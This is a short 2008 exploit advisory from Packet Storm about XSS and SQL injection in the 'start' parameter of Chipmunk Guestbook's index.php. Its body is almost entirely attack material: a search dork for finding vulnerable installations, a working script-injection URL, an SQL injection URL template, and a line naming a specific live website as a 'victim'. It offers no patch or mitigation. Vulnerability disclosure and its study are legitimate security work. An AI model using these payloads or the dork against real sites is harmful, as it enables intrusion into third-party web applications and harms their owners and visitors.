chipmunkguestbook-sqlxss.txt

2008-11-26T00:00:00
ID PACKETSTORM:72329
Type packetstorm
Reporter Pouya Server
Modified 2008-11-26T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: Chipmunk Guestbook  
Vendor : http://www.chipmunk-scripts.com/page.php?ID=13  
Download : http://www.chipmunk-scripts.com/guestbook/guestbooks.zip  
Vulnerable File's : index.php  
Dork: Powered by (c) Chipmunk Guestbook  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Vulnerability : (XSS/SQL)  
---------------------------------------------------------  
#########################################################  
[XSS]:  
http://www.site.com/guestbook/index.php?start=</textarea><script>alert(1369)</script  
>  
  
  
[SQL]:  
http://www.site.com/guestbook/index.php?start=[SQL]  
---------------------------------  
  
Victem :  
http://www.albaniantrip.com/guestbook  
`